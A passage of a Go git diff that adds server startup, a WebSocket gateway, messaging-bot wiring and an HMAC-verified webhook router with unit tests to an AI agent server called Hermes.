+	path := PIDFilePath()
+	if err := os.MkdirAll(filepath.Dir(path), 0700); err != nil {
+		return err
+	}
+	return os.WriteFile(path, []byte(fmt.Sprintf("%d\n", os.Getpid())), 0600)
+}
+
+// removePIDFile removes the PID file if it exists.
+func removePIDFile() {
+	os.Remove(PIDFilePath())
+}
+
+// ReadPIDFile reads the PID from the PID file. Returns 0 if not found.
+func ReadPIDFile() (int, error) {
+	data, err := os.ReadFile(PIDFilePath())
+	if err != nil {
+		if os.IsNotExist(err) {
+			return 0, nil
+		}
+		return 0, err
+	}
+	var pid int
+	fmt.Sscanf(string(data), "%d", &pid)
+	return pid, nil
+}
+
+// Run starts the Hermes server.
+func Run(opts RunOptions, version string) error {
+	config.Verbose = opts.Verbose || opts.Debug
+	if opts.Debug {
+		_ = os.Setenv("VIBECODING_DEBUG", "1")
+	}
+
+	// Load settings.json
+	settings, err := config.LoadSettings()
+	if err != nil {
+		return fmt.Errorf("load settings: %w", err)
+	}
+
+	// Load hermes.json
+	var cfg *HermesConfig
+	if opts.ConfigPath != "" {
+		cfg, err = LoadHermesConfigFrom(opts.ConfigPath)
+	} else {
+		cfg, err = LoadHermesConfig()
+	}
+	if err != nil {
+		return fmt.Errorf("load hermes config: %w", err)
+	}
+
+	// CLI flag overrides
+	if opts.Port != 0 {
+		cfg.Server.Port = opts.Port
+	}
+	if opts.WorkDir != "" {
+		cfg.WorkDir = opts.WorkDir
+	}
+	if opts.Provider != "" {
+		cfg.DefaultProvider = opts.Provider
+	}
+	if opts.Model != "" {
+		cfg.DefaultModel = opts.Model
+	}
+	if opts.MultiAgent {
+		cfg.MultiAgent = true
+	}
+	if opts.Sandbox {
+		cfg.Sandbox = true
+	}
+
+	// Resolve working directory
+	if cfg.WorkDir == "" || cfg.WorkDir == "." {
+		cwd, err := os.Getwd()
+		if err != nil {
+			return fmt.Errorf("get working directory: %w", err)
+		}
+		cfg.WorkDir = cwd
+	}
+
+	// Create cron store (always when cron enabled, for tool registration)
+	var cronStore cron.CronStore
+	var cronScheduler *cron.Scheduler
+	if cfg.Cron.Enabled {
+		storePath := cfg.Cron.StorePath
+		if storePath == "" {
+			storePath = filepath.Join(config.ConfigDir(), "hermes-cron.json")
+		}
+		cronStore = cron.NewFileCronStore(storePath)
+	}
+
+	// Create dispatcher
+	dispatcher, err := NewDispatcher(cfg, settings, version, cronStore, cronScheduler)
+	if err != nil {
+		return fmt.Errorf("create dispatcher: %w", err)
+	}
+
+	// Create and start cron scheduler if multi-agent is available
+	if cfg.Cron.Enabled && dispatcher.agentMgr != nil {
+		interval := time.Duration(cfg.Cron.Interval) * time.Second
+		if interval <= 0 {
+			interval = 30 * time.Second
+		}
+		cronScheduler = cron.NewScheduler(cronStore, dispatcher.agentMgr, interval)
+		cronScheduler.Start()
+	}
+
+	// Create gateway
+	gw := ws.NewGateway(cfg.GetListenAddr(), cfg.Server.AuthToken, version)
+	gw.SetDispatcher(newWSDispatcherAdapter(dispatcher))
+
+	// Set memory store for /api/memory
+	memStore := memory.NewStore(cfg.Memory.Path, cfg.GetWorkDir())
+	gw.SetMemoryStore(memStore)
+
+	// webhook handler is stored here so we can wire platforms after startPlatforms
+	var webhookHandler *WebhookHandler
+
+	// Register webhook routes if configured
+	if cfg.Webhooks.Enabled && len(cfg.Webhooks.Routes) > 0 {
+		var routes []webhook.RouteConfig
+		for _, r := range cfg.Webhooks.Routes {
+			routes = append(routes, webhook.RouteConfig{
+				Path:           r.Path,
+				Events:         r.Events,
+				Skill:          r.Skill,
+				Delivery:       r.Delivery,
+				DeliveryTarget: r.DeliveryTarget,
+			})
+		}
+		webhookHandler = NewWebhookHandler(dispatcher, nil) // platforms wired after startPlatforms
+		router := webhook.NewRouter(routes, cfg.Webhooks.Secret, webhookHandler)
+		gw.RegisterHandler("/webhook/", router)
+	}
+
+	// Register A2A routes if enabled
+	if cfg.A2A.Enabled {
+		a2aCfg := &a2a.Config{
+			Enabled: true,
+			Port:    cfg.A2A.Port,
+			Host:    cfg.Server.Host,
+			WorkDir: cfg.GetWorkDir(),
+		}
+		if a2aCfg.Port == 0 {
+			a2aCfg.Port = 8093
+		}
+		executor := a2a.NewDefaultExecutor(&hermesA2AFactory{dispatcher: dispatcher})
+		a2aSrv := a2a.NewServer(a2aCfg, version, executor)
+		a2aSrv.RegisterRoutes(gw.GetMux())
+		log.Printf("[hermes] A2A routes registered on hermes gateway")
+	}
+
+	srv := &Server{
+		cfg:        cfg,
+		settings:   settings,
+		version:    version,
+		gateway:    gw,
+		dispatcher: dispatcher,
+		scheduler:  cronScheduler,
+	}
+
+	// Print startup info
+	fmt.Fprintf(os.Stderr, "VibeCoding Hermes v%s starting\n", version)
+	fmt.Fprintf(os.Stderr, "  Gateway: http://%s\n", cfg.GetListenAddr())
+	fmt.Fprintf(os.Stderr, "  WebSocket: ws://%s/ws\n", cfg.GetListenAddr())
+	fmt.Fprintf(os.Stderr, "  WorkDir: %s\n", cfg.GetWorkDir())
+	fmt.Fprintf(os.Stderr, "  Provider: %s\n", cfg.GetDefaultProvider(settings.DefaultProvider))
+	fmt.Fprintf(os.Stderr, "  Model: %s\n", cfg.GetDefaultModel(settings.DefaultModel))
+	if cfg.Server.AuthToken != "" {
+		fmt.Fprintf(os.Stderr, "  Auth: enabled\n")
+	} else {
+		fmt.Fprintf(os.Stderr, "  Auth: disabled\n")
+	}
+	if cfg.MultiAgent {
+		fmt.Fprintf(os.Stderr, "  Multi-agent: enabled\n")
+	}
+	if cfg.Sandbox {
+		fmt.Fprintf(os.Stderr, "  Sandbox: enabled\n")
+	} else {
+		fmt.Fprintf(os.Stderr, "  Sandbox: disabled\n")
+	}
+
+	if cfg.Cron.Enabled {
+		if cronScheduler != nil {
+			fmt.Fprintf(os.Stderr, "  Cron: enabled\n")
+		} else {
+			fmt.Fprintf(os.Stderr, "  Cron: disabled (requires --multi-agent)\n")
+		}
+	} else {
+		fmt.Fprintf(os.Stderr, "  Cron: disabled\n")
+	}
+
+	if cfg.Webhooks.Enabled && len(cfg.Webhooks.Routes) > 0 {
+		fmt.Fprintf(os.Stderr, "  Webhooks: %d routes\n", len(cfg.Webhooks.Routes))
+	} else {
+		fmt.Fprintf(os.Stderr, "  Webhooks: disabled\n")
+	}
+
+	// Start messaging platforms
+	srv.startPlatforms()
+
+	// Wire platform map into webhook handler now that platforms are started
+	if webhookHandler != nil && len(srv.platforms) > 0 {
+		pm := make(map[string]messaging.Platform, len(srv.platforms))
+		for _, p := range srv.platforms {
+			pm[p.Name()] = p
+		}
+		webhookHandler.SetPlatforms(pm)
+	}
+
+	// Start gateway (blocking)
+	errCh := make(chan error, 1)
+	go func() {
+		if err := gw.Start(); err != nil && err != http.ErrServerClosed {
+			errCh <- err
+		}
+	}()
+
+	fmt.Fprintf(os.Stderr, "\nReady to serve.\n")
+
+	// Write PID file for stop/status commands
+	if err := writePIDFile(); err != nil {
+		log.Printf("Warning: could not write PID file: %v", err)
+	} else {
+		defer removePIDFile()
+	}
+
+	// Wait for interrupt
+	sigCh := make(chan os.Signal, 1)
+	signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
+
+	select {
+	case err := <-errCh:
+		return fmt.Errorf("gateway error: %w", err)
+	case sig := <-sigCh:
+		fmt.Fprintf(os.Stderr, "\nReceived %s, shutting down...\n", sig)
+		srv.stop()
+	}
+
+	return nil
+}
+
+// startPlatforms connects to enabled messaging platforms.
+func (srv *Server) startPlatforms() {
+	if srv.cfg.Wechat.Enabled {
+		credPath := srv.cfg.GetWechatCredPath()
+		creds, err := wechat.LoadCredentials(credPath)
+		if err != nil || creds == nil {
+			fmt.Fprintf(os.Stderr, "  WeChat: enabled but not logged in — run 'vibecoding hermes wechat login'\n")
+		} else {
+			bot := wechat.NewBot(wechat.BotOptions{
+				CredPath:   credPath,
+				AutoTyping: srv.cfg.Wechat.AutoTyping,
+			})
+			srv.platforms = append(srv.platforms, bot)
+			fmt.Fprintf(os.Stderr, "  WeChat: connected (user: %s, work_dir: %s)\n", creds.UserID, srv.cfg.GetPlatformWorkDir("wechat"))
+
+			// Start in background
+			go func() {
+				if err := bot.Start(context.Background(), func(ctx context.Context, msg messaging.InboundMessage) (string, error) {
+					return srv.dispatcher.HandleMessage(ctx, msg)
+				}); err != nil {
+					log.Printf("[wechat] Platform stopped: %v", err)
+				}
+			}()
+		}
+	} else {
+		fmt.Fprintf(os.Stderr, "  WeChat: disabled\n")
+	}
+
+	if srv.cfg.Feishu.Enabled {
+		if srv.cfg.Feishu.AppID == "" || srv.cfg.Feishu.AppSecret == "" {
+			fmt.Fprintf(os.Stderr, "  Feishu: enabled but app_id/app_secret not configured\n")
+		} else {
+			bot := feishu.NewBot(feishu.BotOptions{
+				AppID:     srv.cfg.Feishu.AppID,
+				AppSecret: srv.cfg.Feishu.AppSecret,
+			})
+			srv.platforms = append(srv.platforms, bot)
+			fmt.Fprintf(os.Stderr, "  Feishu: connecting (work_dir: %s)\n", srv.cfg.GetPlatformWorkDir("feishu"))
+
+			go func() {
+				if err := bot.Start(context.Background(), func(ctx context.Context, msg messaging.InboundMessage) (string, error) {
+					return srv.dispatcher.HandleMessage(ctx, msg)
+				}); err != nil {
+					log.Printf("[feishu] Platform stopped: %v", err)
+				}
+			}()
+		}
+	} else {
+		fmt.Fprintf(os.Stderr, "  Feishu: disabled\n")
+	}
+
+	if srv.cfg.Cron.Enabled {
+		if srv.scheduler == nil {
+			fmt.Fprintf(os.Stderr, "  Cron: disabled (requires --multi-agent)\n")
+		}
+	} else {
+		fmt.Fprintf(os.Stderr, "  Cron: disabled\n")
+	}
+
+	if srv.cfg.A2A.Enabled {
+		fmt.Fprintf(os.Stderr, "  A2A: enabled\n")
+	}
+}
+
+// hermesA2AFactory creates agents for A2A task execution via hermes dispatcher.
+type hermesA2AFactory struct {
+	dispatcher *Dispatcher
+}
+
+func (f *hermesA2AFactory) CreateForA2A(workDir string, mode string) (*agent.Agent, error) {
+	if workDir == "" {
+		workDir = f.dispatcher.cfg.GetWorkDir()
+	}
+	// Create a new agent using the dispatcher's provider and settings
+	a := agent.New(agent.Config{
+		Provider:   f.dispatcher.provider,
+		Model:      f.dispatcher.model,
+		Mode:       mode,
+		SandboxMgr: sandbox.NewManager(workDir),
+		Settings:   f.dispatcher.settings,
+	}, tools.NewRegistry(workDir, sandbox.NewManager(workDir).GetActive()))
+	return a, nil
+}
+
+// stop gracefully shuts down all components.
+func (srv *Server) stop() {
+	// Stop cron scheduler
+	if srv.scheduler != nil {
+		srv.scheduler.Stop()
+	}
+
+	// Stop messaging platforms
+	for _, p := range srv.platforms {
+		log.Printf("Stopping platform: %s", p.Name())
+		p.Stop()
+	}
+
+	// Stop gateway
+	if err := srv.gateway.Stop(10 * time.Second); err != nil {
+		log.Printf("Gateway shutdown error: %v", err)
+	}
+}
+
+// --- WS Dispatcher adapter ---
+// Bridges hermes.Dispatcher to ws.Dispatcher interface.
+
+type wsDispatcherAdapter struct {
+	d *Dispatcher
+}
+
+func newWSDispatcherAdapter(d *Dispatcher) *wsDispatcherAdapter {
+	return &wsDispatcherAdapter{d: d}
+}
+
+func (a *wsDispatcherAdapter) HandleWSMessage(ctx context.Context, connID, text string, eventCh chan<- ws.WSEvent) error {
+	// Command path
+	if len(text) > 0 && text[0] == '/' {
+		result := a.d.handleCommandForWS(connID, text)
+		eventCh <- ws.WSEvent{
+			Type:    "command_result",
+			Command: text,
+			Message: result,
+		}
+		eventCh <- ws.WSEvent{Type: "done", StopReason: "end_turn"}
+		return nil
+	}
+
+	// Regular message — run agent with streaming
+	sess, err := a.d.resolveSession("ws", connID)
+	if err != nil {
+		return err
+	}
+
+	sess.Lock()
+	defer sess.Unlock()
+	sess.Touch()
+
+	// Run agent in goroutine, convert agent events to ws events
+	agentCh := make(chan agent.Event, 100)
+	errCh := make(chan error, 1)
+	go func() {
+		errCh <- a.d.runAgentStreaming(ctx, sess, text, agentCh)
+	}()
+
+	for ev := range agentCh {
+		wsev := agentEventToWSEvent(ev)
+		eventCh <- wsev
+	}
+
+	if err := <-errCh; err != nil {
+		eventCh <- ws.WSEvent{Type: "error", Message: err.Error()}
+	}
+	return nil
+}
+
+// agentEventToWSEvent converts an agent.Event to a ws.WSEvent.
+func agentEventToWSEvent(ev agent.Event) ws.WSEvent {
+	switch ev.Type {
+	case agent.EventTextDelta:
+		return ws.WSEvent{Type: "text_delta", Content: ev.TextDelta}
+	case agent.EventThinkDelta:
+		return ws.WSEvent{Type: "think_delta", Content: ev.ThinkDelta}
+	case agent.EventToolCall:
+		evTool := ws.WSEvent{
+			Type:   "tool_call",
+			Tool:   ev.ToolName,
+			CallID: ev.ToolCallID,
+			Args:   ev.ToolArgs,
+		}
+		if ev.ToolCall != nil {
+			evTool.Tool = ev.ToolCall.Name
+			evTool.CallID = ev.ToolCall.ID
+		}
+		return evTool
+	case agent.EventToolExecutionEnd:
+		name := ev.ToolName
+		if name == "" && ev.ToolCall != nil {
+			name = ev.ToolCall.Name
+		}
+		result := ws.WSEvent{
+			Type:   "tool_result",
+			Tool:   name,
+			CallID: ev.ToolCallID,
+			Result: ev.ToolResult,
+		}
+		if ev.ToolError != nil {
+			result.Code = "error"
+			result.Message = ev.ToolError.Error()
+		}
+		if ev.ToolDiff != nil {
+			result.Type = "tool_diff"
+			result.Path = ev.ToolDiff.Path
+			result.Diff = ev.ToolDiff.Unified
+		}
+		return result
+	case agent.EventContextPressure, agent.EventBudgetPressure:
+		return ws.WSEvent{
+			Type:    "status",
+			Message: ev.PressureMessage,
+		}
+	case agent.EventToolApprovalRequest:
+		return ws.WSEvent{
+			Type:       "approval_request",
+			ApprovalID: ev.ApprovalID,
+			Tool:       ev.ApprovalTool,
+			Args:       ev.ApprovalArgs,
+		}
+	case agent.EventDone:
+		return ws.WSEvent{Type: "done", StopReason: ev.StopReason}
+	case agent.EventStatus:
+		return ws.WSEvent{Type: "status", Message: ev.StatusMessage}
+	case agent.EventError:
+		msg := ""
+		if ev.Error != nil {
+			msg = ev.Error.Error()
+		}
+		return ws.WSEvent{Type: "error", Message: msg, Code: ev.StopReason}
+	case agent.EventUsage:
+		evWS := ws.WSEvent{Type: "usage"}
+		if ev.Usage != nil {
+			evWS.PromptTokens = ev.Usage.PromptTokens()
+			evWS.CompletionTokens = ev.Usage.Output
+			evWS.TotalTokens = ev.Usage.TotalTokens
+			evWS.CacheReadTokens = ev.Usage.CacheRead
+			evWS.CacheWriteTokens = ev.Usage.CacheWrite
+		}
+		return evWS
+	default:
+		// Skip lifecycle events (AgentStart, AgentEnd, TurnStart, TurnEnd, etc.)
+		return ws.WSEvent{}
+	}
+}
+
+func (a *wsDispatcherAdapter) ListSessions() []ws.SessionInfo {
+	sessions := a.d.ListSessions()
+	result := make([]ws.SessionInfo, 0, len(sessions))
+	for _, s := range sessions {
+		msgs := s.Manager.GetMessages()
+		preview := ""
+		for _, m := range msgs {
+			if m.Role == "user" {
+				preview = m.Content
+				if len(preview) > 60 {
+					preview = preview[:60] + "..."
+				}
+				break
+			}
+		}
+		result = append(result, ws.SessionInfo{
+			ID:           s.ID,
+			Platform:     s.Platform,
+			UserID:       s.UserID,
+			WorkDir:      s.WorkDir,
+			Mode:         s.Mode,
+			MessageCount: len(msgs),
+			LastActive:   s.LastUsed,
+			Preview:      preview,
+		})
+	}
+	return result
+}
+
+func (a *wsDispatcherAdapter) RemoveSession(key string) {
+	a.d.RemoveSession(key)
+}
+
+func (a *wsDispatcherAdapter) ResolveApproval(approvalID string, approved bool) bool {
+	return a.d.ResolveApproval(approvalID, approved)
+}
diff --git a/internal/hermes/webhook/router.go b/internal/hermes/webhook/router.go
new file mode 100644
index 0000000..9ea23b5
--- /dev/null
+++ b/internal/hermes/webhook/router.go
@@ -0,0 +1,168 @@
+// Package webhook implements inbound webhook routing for Hermes mode.
+// External services (GitHub, CI, etc.) POST events to /webhook/<path>,
+// which are verified and dispatched to agent tasks.
+package webhook
+
+import (
+	"context"
+	"crypto/hmac"
+	"crypto/sha256"
+	"encoding/hex"
+	"encoding/json"
+	"io"
+	"log"
+	"net/http"
+	"strings"
+)
+
+// RouteConfig defines a webhook route.
+type RouteConfig struct {
+	Path           string   `json:"path"`
+	Events         []string `json:"events"`
+	Skill          string   `json:"skill"`
+	Delivery       string   `json:"delivery"`                  // "wechat", "feishu", or "" (no delivery)
+	DeliveryTarget string   `json:"delivery_target,omitempty"` // platform-specific recipient id
+}
+
+// Handler processes incoming webhook events.
+type Handler interface {
+	HandleWebhookEvent(ctx context.Context, route RouteConfig, payload []byte) error
+}
+
+// Router manages webhook routes and dispatches events.
+type Router struct {
+	routes  []RouteConfig
+	secret  string
+	handler Handler
+}
+
+// NewRouter creates a webhook router.
+func NewRouter(routes []RouteConfig, secret string, handler Handler) *Router {
+	return &Router{
+		routes:  routes,
+		secret:  secret,
+		handler: handler,
+	}
+}
+
+// ServeHTTP handles incoming webhook requests.
+// Expected path: /webhook/<route-path>
+func (r *Router) ServeHTTP(w http.ResponseWriter, req *http.Request) {
+	if req.Method != http.MethodPost {
+		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+
+	// Extract the route path from URL
+	path := strings.TrimPrefix(req.URL.Path, "/webhook")
+	if path == "" {
+		path = "/"
+	}
+
+	// Find matching route
+	var route *RouteConfig
+	for i := range r.routes {
+		if r.routes[i].Path == path {
+			route = &r.routes[i]
+			break
+		}
+	}
+	if route == nil {
+		http.Error(w, "no route for path: "+path, http.StatusNotFound)
+		return
+	}
+
+	// Read body
+	body, err := io.ReadAll(io.LimitReader(req.Body, 10*1024*1024)) // 10MB limit
+	if err != nil {
+		http.Error(w, "read body error", http.StatusBadRequest)
+		return
+	}
+
+	// Verify signature if secret is configured
+	if r.secret != "" {
+		sig := req.Header.Get("X-Hub-Signature-256")
+		if sig == "" {
+			sig = req.Header.Get("X-Signature-256")
+		}
+		if !r.verifySignature(body, sig) {
+			http.Error(w, "invalid signature", http.StatusUnauthorized)
+			return
+		}
+	}
+
+	// Check event type filter
+	eventType := req.Header.Get("X-GitHub-Event")
+	if eventType == "" {
+		// Try to extract from body
+		var generic struct {
+			Action string `json:"action"`
+			Type   string `json:"type"`
+		}
+		json.Unmarshal(body, &generic)
+		if generic.Action != "" {
+			eventType = generic.Action
+		} else if generic.Type != "" {
+			eventType = generic.Type
+		}
+	}
+
+	if !routeMatchesEvent(route.Events, eventType) {
+		// Event type not in filter — acknowledge but skip
+		writeJSON(w, http.StatusOK, map[string]string{"status": "skipped", "reason": "event type not matched"})
+		return
+	}
+
+	// Dispatch to handler
+	log.Printf("[webhook] Received event on %s (type: %s, %d bytes)", path, eventType, len(body))
+
+	if r.handler != nil {
+		go func() {
+			if err := r.handler.HandleWebhookEvent(context.Background(), *route, body); err != nil {
+				log.Printf("[webhook] Handler error for %s: %v", path, err)
+			}
+		}()
+	}
+
+	writeJSON(w, http.StatusOK, map[string]string{"status": "accepted"})
+}
+
+// verifySignature verifies HMAC-SHA256 signature.
+func (r *Router) verifySignature(body []byte, signature string) bool {
+	if signature == "" {
+		return false
+	}
+
+	// Strip "sha256=" prefix
+	sig := strings.TrimPrefix(signature, "sha256=")
+
+	mac := hmac.New(sha256.New, []byte(r.secret))
+	mac.Write(body)
+	expected := hex.EncodeToString(mac.Sum(nil))
+
+	return hmac.Equal([]byte(sig), []byte(expected))
+}
+
+func writeJSON(w http.ResponseWriter, status int, v any) {
+	w.Header().Set("Content-Type", "application/json")
+	w.WriteHeader(status)
+	json.NewEncoder(w).Encode(v)
+}
+
+func routeMatchesEvent(events []string, eventType string) bool {
+	if len(events) == 0 {
+		return true
+	}
+	for _, ev := range events {
+		if ev == "*" {
+			return true
+		}
+		if eventType != "" && ev == eventType {
+			return true
+		}
+	}
+	return false
+}
+
+// Ensure Router satisfies http.Handler.
+var _ http.Handler = (*Router)(nil)
diff --git a/internal/hermes/webhook/router_test.go b/internal/hermes/webhook/router_test.go
new file mode 100644
index 0000000..1227495
--- /dev/null
+++ b/internal/hermes/webhook/router_test.go
@@ -0,0 +1,320 @@
+package webhook
+
+import (
+	"bytes"
+	"context"
+	"crypto/hmac"
+	"crypto/sha256"
+	"encoding/hex"
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"sync"
+	"testing"
+	"time"
+)
+
+func TestNewRouter(t *testing.T) {
+	routes := []RouteConfig{
+		{Path: "/github", Events: []string{"push", "pull_request"}, Skill: "code-review", Delivery: "wechat"},
+	}
+	handler := &mockHandler{}
+	router := NewRouter(routes, "secret123", handler)
+
+	if router == nil {
+		t.Fatal("expected router")
+	}
+}
+
+func TestRouterServeHTTPNoRoute(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{}, "", handler)
+
+	req := httptest.NewRequest("POST", "/webhook/unknown", nil)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusNotFound {
+		t.Errorf("expected 404, got %d", w.Code)
+	}
+}
+
+func TestRouterServeHTTPMethodNotAllowed(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"push"}},
+	}, "", handler)
+
+	req := httptest.NewRequest("GET", "/webhook/github", nil)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusMethodNotAllowed {
+		t.Errorf("expected 405, got %d", w.Code)
+	}
+}
+
+func TestRouterServeHTTPMatchRoute(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"push", "pull_request"}},
+	}, "", handler)
+
+	body := `{"action": "push"}`
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader([]byte(body)))
+	req.Header.Set("X-GitHub-Event", "push")
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+	if !handler.waitCalled(t) {
+		t.Fatal("expected handler to be called")
+	}
+	if !handler.called {
+		t.Error("expected handler to be called")
+	}
+}
+
+func TestRouterServeHTTPEventFilter(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"push"}},
+	}, "", handler)
+
+	body := `{"action": "issues"}`
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader([]byte(body)))
+	req.Header.Set("X-GitHub-Event", "issues")
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+	if handler.called {
+		t.Error("expected handler NOT to be called (event filtered)")
+	}
+}
+
+func TestRouterServeHTTPWildcardEvent(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/ci", Events: []string{"*"}},
+	}, "", handler)
+
+	body := `{"type": "build"}`
+	req := httptest.NewRequest("POST", "/webhook/ci", bytes.NewReader([]byte(body)))
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+	if !handler.waitCalled(t) {
+		t.Fatal("expected handler to be called (wildcard)")
+	}
+	if !handler.called {
+		t.Error("expected handler to be called (wildcard)")
+	}
+}
+
+func TestRouterServeHTTPRejectsUnknownEventType(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"push"}},
+	}, "", handler)
+
+	body := `{"repository": {"name": "repo"}}`
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader([]byte(body)))
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("expected 200, got %d", w.Code)
+	}
+	var resp map[string]string
+	if err := json.NewDecoder(w.Body).Decode(&resp); err != nil {
+		t.Fatalf("decode response: %v", err)
+	}
+	if resp["status"] != "skipped" {
+		t.Fatalf("expected skipped response, got %#v", resp)
+	}
+	if handler.waitCalled(t) {
+		t.Fatal("expected handler not to be called for unknown event type")
+	}
+}
+
+func TestRouterSignatureVerification(t *testing.T) {
+	secret := "test-secret"
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"*"}},
+	}, secret, handler)
+
+	body := []byte(`{"action": "push"}`)
+
+	// Compute correct signature
+	mac := hmac.New(sha256.New, []byte(secret))
+	mac.Write(body)
+	sig := "sha256=" + hex.EncodeToString(mac.Sum(nil))
+
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader(body))
+	req.Header.Set("X-Hub-Signature-256", sig)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+	if !handler.waitCalled(t) {
+		t.Fatal("expected handler to be called with valid signature")
+	}
+	if !handler.called {
+		t.Error("expected handler to be called with valid signature")
+	}
+}
+
+func TestRouterSignatureVerificationInvalid(t *testing.T) {
+	secret := "test-secret"
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"*"}},
+	}, secret, handler)
+
+	body := []byte(`{"action": "push"}`)
+
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader(body))
+	req.Header.Set("X-Hub-Signature-256", "sha256=invalid")
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("expected 401, got %d", w.Code)
+	}
+	if handler.called {
+		t.Error("expected handler NOT to be called with invalid signature")
+	}
+}
+
+func TestRouterSignatureVerificationMissing(t *testing.T) {
+	secret := "test-secret"
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"*"}},
+	}, secret, handler)
+
+	body := []byte(`{"action": "push"}`)
+
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader(body))
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("expected 401, got %d", w.Code)
+	}
+}
+
+func TestRouterNoSecret(t *testing.T) {
+	handler := &mockHandler{}
+	router := NewRouter([]RouteConfig{
+		{Path: "/github", Events: []string{"*"}},
+	}, "", handler)
+
+	body := []byte(`{"action": "push"}`)
+
+	req := httptest.NewRequest("POST", "/webhook/github", bytes.NewReader(body))
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+	if !handler.waitCalled(t) {
+		t.Fatal("expected handler to be called (no secret)")
+	}
+	if !handler.called {
+		t.Error("expected handler to be called (no secret)")
+	}
+}
+
+func TestVerifySignature(t *testing.T) {
+	router := &Router{secret: "test"}
+
+	body := []byte("hello")
+	mac := hmac.New(sha256.New, []byte("test"))
+	mac.Write(body)
+	validSig := "sha256=" + hex.EncodeToString(mac.Sum(nil))
+
+	if !router.verifySignature(body, validSig) {
+		t.Error("expected valid signature")
+	}
+
+	if router.verifySignature(body, "sha256=invalid") {
+		t.Error("expected invalid signature")
+	}
+
+	if router.verifySignature(body, "") {
+		t.Error("expected empty signature to fail")
+	}
+}
+
+func TestWriteJSON(t *testing.T) {
+	w := httptest.NewRecorder()
+	writeJSON(w, http.StatusOK, map[string]string{"status": "ok"})
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	contentType := w.Header().Get("Content-Type")
+	if contentType != "application/json" {
+		t.Errorf("expected application/json, got %s", contentType)
+	}
+
+	var result map[string]string
+	json.NewDecoder(w.Body).Decode(&result)
+	if result["status"] != "ok" {
+		t.Errorf("expected ok, got %s", result["status"])
+	}
+}
+
+type mockHandler struct {
+	mu        sync.Mutex
+	called    bool
+	lastRoute RouteConfig
+	calledCh  chan struct{}
+}
+
+func (h *mockHandler) HandleWebhookEvent(ctx context.Context, route RouteConfig, payload []byte) error {
+	h.mu.Lock()
+	h.called = true
+	h.lastRoute = route
+	if h.calledCh == nil {
+		h.calledCh = make(chan struct{})
+	}
+	close(h.calledCh)
+	h.mu.Unlock()
+	return nil
+}
+
+func (h *mockHandler) waitCalled(t *testing.T) bool {
+	t.Helper()
+	h.mu.Lock()
+	ch := h.calledCh
+	if h.called {
+		h.mu.Unlock()
+		return true
+	}
+	if ch == nil {
+		ch = make(chan struct{})
+		h.calledCh = ch
+	}
+	h.mu.Unlock()
+	select {
+	case <-ch:
+		return true
+	case <-time.After(time.Second):
+		return false
+	}
+}
diff --git a/internal/hermes/webhook_handler.go b/internal/hermes/webhook_handler.go
new file mode 100644
index 0000000..e792a3f
--- /dev/null
+++ b/internal/hermes/webhook_handler.go
@@ -0,0 +1,95 @@
+package hermes
+
+import (
+	"context"
+	"fmt"
+	"log"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/hermes/webhook"
+	"github.com/startvibecoding/vibecoding/internal/messaging"
+)
+
+// WebhookHandler implements webhook.Handler by spawning agent tasks.
+type WebhookHandler struct {
+	dispatcher *Dispatcher
+	platforms  map[string]messaging.Platform // platform name → Platform for delivery
+}
+
+// NewWebhookHandler creates a webhook handler that spawns agent tasks.
+func NewWebhookHandler(dispatcher *Dispatcher, platforms map[string]messaging.Platform) *WebhookHandler {
+	return &WebhookHandler{
+		dispatcher: dispatcher,
+		platforms:  platforms,
+	}
+}
+
+// SetPlatforms replaces the platform map. Used to wire platforms after construction.
+func (h *WebhookHandler) SetPlatforms(platforms map[string]messaging.Platform) {
+	h.platforms = platforms
+}
+
+// HandleWebhookEvent processes an incoming webhook event by spawning an agent task.
